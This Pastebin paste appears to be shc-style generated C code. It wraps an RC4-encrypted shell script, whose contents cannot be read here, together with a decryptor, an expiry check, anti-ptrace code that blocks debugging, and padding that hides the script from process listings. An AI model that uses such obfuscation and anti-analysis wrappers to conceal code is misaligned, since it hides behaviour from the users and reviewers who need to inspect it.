Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- static char data [] =
- #define shll_z 8
- #define shll ((&data[2]))
- "\025\011\130\016\001\157\174\214\266\207\305"
- #define chk2_z 19
- #define chk2 ((&data[15]))
- "\157\014\306\146\274\343\051\224\344\123\303\253\102\204\375\133"
- "\226\341\231\073\067\366\021\201\337"
- #define inlo_z 3
- #define inlo ((&data[36]))
- "\047\031\063"
- #define tst2_z 19
- #define tst2 ((&data[43]))
- "\220\153\001\155\202\024\350\017\237\261\045\075\171\152\117\240"
- "\252\360\066\314\012\046\101\341"
- #define msg1_z 42
- #define msg1 ((&data[70]))
- "\020\142\301\220\052\330\236\342\132\325\103\042\071\172\113\272"
- "\311\112\146\373\372\136\002\005\360\001\124\217\007\114\135\024"
- "\073\332\170\216\361\332\370\340\154\025\042\261\141\054\127\074"
- "\240\020"
- #define rlax_z 1
- #define rlax ((&data[113]))
- "\054"
- #define pswd_z 256
- #define pswd ((&data[121]))
- "\114\064\222\035\200\322\303\124\142\273\247\204\176\025\252\030"
- "\326\051\036\075\151\022\335\073\227\200\104\143\300\160\370\044"
- "\152\045\145\361\045\065\276\234\376\340\373\250\353\163\061\171"
- "\271\071\127\356\220\221\065\372\353\366\115\276\154\027\020\227"
- "\026\303\325\120\315\241\047\052\152\306\260\262\162\010\243\207"
- "\143\275\341\310\072\075\364\044\173\375\102\266\361\144\020\377"
- "\273\162\355\362\303\300\171\120\152\002\137\055\035\310\120\172"
- "\025\174\352\262\137\131\131\270\070\117\105\110\072\361\075\177"
- "\302\022\351\176\350\077\133\077\036\356\015\136\312\263\302\304"
- "\000\163\102\113\255\166\224\003\222\231\217\110\225\203\164\350"
- "\066\200\276\376\031\255\025\241\337\177\160\133\277\066\351\367"
- "\172\273\320\104\233\332\354\130\062\133\162\046\170\076\020\014"
- "\051\313\121\222\013\117\206\062\377\054\217\176\250\175\354\266"
- "\264\157\167\220\123\116\136\300\270\143\071\047\373\266\352\155"
- "\311\042\103\101\044\364\327\022\016\323\102\360\366\116\350\113"
- "\011\054\031\172\151\021\140\031\302\311\327\311\304\211\134\075"
- "\235\351\345\141\301\343\003\035\013\267\132\033\221\144\211\310"
- "\346\254\322\221\241\260\210\237\141\145\371\125\071\076\122\113"
- "\054\032\170\015\061\210\213\230\126\272\246\014\075\002\116\172"
- "\252\147\150\370\072\347\372\015\372\242\237"
- #define opts_z 1
- #define opts ((&data[429]))
- "\226"
- #define msg2_z 19
- #define msg2 ((&data[431]))
- "\107\177\154\341\240\023\214\033\145\332\330\206\202\123\343\335"
- "\133\101\266\270\221\333\341\250"
- #define tst1_z 22
- #define tst1 ((&data[456]))
- "\133\236\173\317\105\303\020\202\277\105\237\326\214\045\345\275"
- "\224\323\260\335\261\276\267\140\147\114\044\127\163"
- #define text_z 41
- #define text ((&data[485]))
- "\072\162\057\162\141\046\323\223\026\030\161\341\142\310\143\163"
- "\254\104\342\234\363\075\201\377\356\351\107\000\046\300\063\120"
- "\303\116\154\232\225\223\150\343\067\251\241\356\320\170\070\220"
- "\356\235\002\155"
- #define date_z 1
- #define date ((&data[535]))
- "\035"
- #define xecc_z 15
- #define xecc ((&data[539]))
- "\051\232\220\173\146\167\173\113\326\222\102\341\040\012\074\354"
- "\260\330\321\346\377"
- #define lsto_z 1
- #define lsto ((&data[557]))
- "\361"
- #define chk1_z 22
- #define chk1 ((&data[561]))
- "\332\024\326\034\051\111\266\001\147\104\024\200\120\257\353\255"
- "\137\112\012\266\375\317\320\360\014\077\241\167\237"/* End of data[] */;
- #define hide_z 4096
- #define DEBUGEXEC 0 /* Define as 1 to debug execvp calls */
- #define TRACEABLE 0 /* Define as 1 to enable ptrace the executable */
- /* rtc.c */
- #include <sys/stat.h>
- #include <sys/types.h>
- #include <errno.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <time.h>
- #include <unistd.h>
- /* 'Alleged RC4' */
- static unsigned char stte[256], indx, jndx, kndx;
- /*
- * Reset arc4 stte.
- */
- void stte_0(void)
- {
- indx = jndx = kndx = 0;
- do {
- stte[indx] = indx;
- } while (++indx);
- }
- /*
- * Set key. Can be used more than once.
- */
- void key(void * str, int len)
- {
- unsigned char tmp, * ptr = (unsigned char *)str;
- while (len > 0) {
- do {
- tmp = stte[indx];
- kndx += tmp;
- kndx += ptr[(int)indx % len];
- stte[indx] = stte[kndx];
- stte[kndx] = tmp;
- } while (++indx);
- ptr += 256;
- len -= 256;
- }
- }
- /*
- * Crypt data.
- */
- void arc4(void * str, int len)
- {
- unsigned char tmp, * ptr = (unsigned char *)str;
- while (len > 0) {
- indx++;
- tmp = stte[indx];
- jndx += tmp;
- stte[indx] = stte[jndx];
- stte[jndx] = tmp;
- tmp += stte[indx];
- *ptr ^= stte[tmp];
- ptr++;
- len--;
- }
- }
- /* End of ARC4 */
- /*
- * Key with file invariants.
- */
- int key_with_file(char * file)
- {
- struct stat statf[1];
- struct stat control[1];
- if (stat(file, statf) < 0)
- return -1;
- /* Turn on stable fields */
- memset(control, 0, sizeof(control));
- control->st_ino = statf->st_ino;
- control->st_dev = statf->st_dev;
- control->st_rdev = statf->st_rdev;
- control->st_uid = statf->st_uid;
- control->st_gid = statf->st_gid;
- control->st_size = statf->st_size;
- control->st_mtime = statf->st_mtime;
- control->st_ctime = statf->st_ctime;
- key(control, sizeof(control));
- return 0;
- }
- #if DEBUGEXEC
- void debugexec(char * sh11, int argc, char ** argv)
- {
- int i;
- fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
- fprintf(stderr, "argc=%d\n", argc);
- if (!argv) {
- fprintf(stderr, "argv=<null>\n");
- } else {
- for (i = 0; i <= argc ; i++)
- fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
- }
- }
- #endif /* DEBUGEXEC */
- void rmarg(char ** argv, char * arg)
- {
- for (; argv && *argv && *argv != arg; argv++);
- for (; argv && *argv; argv++)
- *argv = argv[1];
- }
- int chkenv(int argc)
- {
- char buff[512];
- unsigned long mask, m;
- int l, a, c;
- char * string;
- extern char ** environ;
- mask = (unsigned long)&chkenv;
- mask ^= (unsigned long)getpid() * ~mask;
- sprintf(buff, "x%lx", mask);
- string = getenv(buff);
- #if DEBUGEXEC
- fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
- #endif
- l = strlen(buff);
- if (!string) {
- /* 1st */
- sprintf(&buff[l], "=%lu %d", mask, argc);
- putenv(strdup(buff));
- return 0;
- }
- c = sscanf(string, "%lu %d%c", &m, &a, buff);
- if (c == 2 && m == mask) {
- /* 3rd */
- rmarg(environ, &string[-l - 1]);
- return 1 + (argc - a);
- }
- return -1;
- }
- #if !TRACEABLE
- #define _LINUX_SOURCE_COMPAT
- #include <sys/ptrace.h>
- #include <sys/types.h>
- #include <sys/wait.h>
- #include <fcntl.h>
- #include <signal.h>
- #include <stdio.h>
- #include <unistd.h>
- #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
- # define PTRACE_ATTACH PT_ATTACH
- #endif
- void untraceable(char * argv0)
- {
- char proc[80];
- int pid, mine;
- switch(pid = fork()) {
- case 0:
- pid = getppid();
- /* For problematic SunOS ptrace */
- #if defined(__FreeBSD__)
- sprintf(proc, "/proc/%d/mem", (int)pid);
- #else
- sprintf(proc, "/proc/%d/as", (int)pid);
- #endif
- close(0);
- mine = !open(proc, O_RDWR|O_EXCL);
- if (!mine && errno != EBUSY)
- mine = !ptrace(PTRACE_ATTACH, pid, 0, 0);
- if (mine) {
- kill(pid, SIGCONT);
- } else {
- perror(argv0);
- kill(pid, SIGKILL);
- }
- _exit(mine);
- case -1:
- break;
- default:
- if (pid == waitpid(pid, 0, 0))
- return;
- }
- perror(argv0);
- _exit(1);
- }
- #endif /* !TRACEABLE */
- char * xsh(int argc, char ** argv)
- {
- char * scrpt;
- int ret, i, j;
- char ** varg;
- char * me = getenv("_");
- if (me == NULL) { me = argv[0]; }
- stte_0();
- key(pswd, pswd_z);
- arc4(msg1, msg1_z);
- arc4(date, date_z);
- if (date[0] && (atoll(date)<time(NULL)))
- return msg1;
- arc4(shll, shll_z);
- arc4(inlo, inlo_z);
- arc4(xecc, xecc_z);
- arc4(lsto, lsto_z);
- arc4(tst1, tst1_z);
- key(tst1, tst1_z);
- arc4(chk1, chk1_z);
- if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
- return tst1;
- ret = chkenv(argc);
- arc4(msg2, msg2_z);
- if (ret < 0)
- return msg2;
- varg = (char **)calloc(argc + 10, sizeof(char *));
- if (!varg)
- return 0;
- if (ret) {
- arc4(rlax, rlax_z);
- if (!rlax[0] && key_with_file(shll))
- return shll;
- arc4(opts, opts_z);
- arc4(text, text_z);
- arc4(tst2, tst2_z);
- key(tst2, tst2_z);
- arc4(chk2, chk2_z);
- if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
- return tst2;
- /* Prepend hide_z spaces to script text to hide it. */
- scrpt = malloc(hide_z + text_z);
- if (!scrpt)
- return 0;
- memset(scrpt, (int) ' ', hide_z);
- memcpy(&scrpt[hide_z], text, text_z);
- } else { /* Reexecute */
- if (*xecc) {
- scrpt = malloc(512);
- if (!scrpt)
- return 0;
- sprintf(scrpt, xecc, me);
- } else {
- scrpt = me;
- }
- }
- j = 0;
- varg[j++] = argv[0]; /* My own name at execution */
- if (ret && *opts)
- varg[j++] = opts; /* Options on 1st line of code */
- if (*inlo)
- varg[j++] = inlo; /* Option introducing inline code */
- varg[j++] = scrpt; /* The script itself */
- if (*lsto)
- varg[j++] = lsto; /* Option meaning last option */
- i = (ret > 1) ? ret : 0; /* Args numbering correction */
- while (i < argc)
- varg[j++] = argv[i++]; /* Main run-time arguments */
- varg[j] = 0; /* NULL terminated array */
- #if DEBUGEXEC
- debugexec(shll, j, varg);
- #endif
- execvp(shll, varg);
- return shll;
- }
- int main(int argc, char ** argv)
- {
- #if DEBUGEXEC
- debugexec("main", argc, argv);
- #endif
- #if !TRACEABLE
- untraceable(argv[0]);
- #endif
- argv[1] = xsh(argc, argv);
- fprintf(stderr, "%s%s%s: %s\n", argv[0],
- errno ? ": " : "",
- errno ? strerror(errno) : "",
- argv[1] ? argv[1] : "<null>"
- );
- return 1;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement